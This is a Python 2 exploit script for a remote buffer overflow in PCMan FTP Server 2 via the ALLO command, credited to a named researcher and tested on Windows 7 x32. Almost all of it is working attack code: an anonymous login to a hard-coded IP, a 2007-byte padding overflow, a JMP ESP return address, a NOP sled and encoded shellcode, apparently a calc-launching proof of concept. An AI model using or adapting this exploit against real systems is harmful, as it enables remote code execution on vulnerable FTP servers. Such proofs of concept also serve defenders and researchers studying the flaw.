Share
# Vulnerability Title: PCMan FTP Server 2 - 'ALLO' Remote Buffer Overflow   
# Discovered by: Nassim Asrir  
# Tested on: win7 x32  
# Thanks To : Chagi-Lagi - MY.Neggaoui  
#!/usr/bin/python2.7  
# -*- coding: utf-8 -*  
import socket  
  
ret = "\xf7\xf8\xc5\x75" #@ JMP ESP Kernel32.dll  
calc =("\xdd\xc5\xd9\x74\x24\xf4\x5a\x31\xc9\xb8\xd1\x96\xc1\xcb\xb1"  
"\x33\x31\x42\x17\x83\xc2\x04\x03\x93\x85\x23\x3e\xef\x42\x2a"  
"\xc1\x0f\x93\x4d\x4b\xea\xa2\x5f\x2f\x7f\x96\x6f\x3b\x2d\x1b"  
"\x1b\x69\xc5\xa8\x69\xa6\xea\x19\xc7\x90\xc5\x9a\xe9\x1c\x89"  
"\x59\x6b\xe1\xd3\x8d\x4b\xd8\x1c\xc0\x8a\x1d\x40\x2b\xde\xf6"  
"\x0f\x9e\xcf\x73\x4d\x23\xf1\x53\xda\x1b\x89\xd6\x1c\xef\x23"  
"\xd8\x4c\x40\x3f\x92\x74\xea\x67\x03\x85\x3f\x74\x7f\xcc\x34"  
"\x4f\x0b\xcf\x9c\x81\xf4\xfe\xe0\x4e\xcb\xcf\xec\x8f\x0b\xf7"  
"\x0e\xfa\x67\x04\xb2\xfd\xb3\x77\x68\x8b\x21\xdf\xfb\x2b\x82"  
"\xde\x28\xad\x41\xec\x85\xb9\x0e\xf0\x18\x6d\x25\x0c\x90\x90"  
"\xea\x85\xe2\xb6\x2e\xce\xb1\xd7\x77\xaa\x14\xe7\x68\x12\xc8"  
"\x4d\xe2\xb0\x1d\xf7\xa9\xde\xe0\x75\xd4\xa7\xe3\x85\xd7\x87"  
"\x8b\xb4\x5c\x48\xcb\x48\xb7\x2d\x23\x03\x9a\x07\xac\xca\x4e"  
"\x1a\xb1\xec\xa4\x58\xcc\x6e\x4d\x20\x2b\x6e\x24\x25\x77\x28"  
"\xd4\x57\xe8\xdd\xda\xc4\x09\xf4\xb8\x8b\x99\x94\x10\x2e\x1a"  
"\x3e\x6d")  
  
buffer1= '\x41' * 2007 + ret + "\x90" * 40 + calc  
  
print "Sending..."  
  
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
connect=s.connect(('192.168.108.129',21))  
s.recv(1024)  
s.send('USER anonymous\r\n')  
s.recv(1024)  
s.send('PASS \r\n')  
s.recv(1024)  
s.send('ALLO' + buffer1 + '\r\n')  
s.close()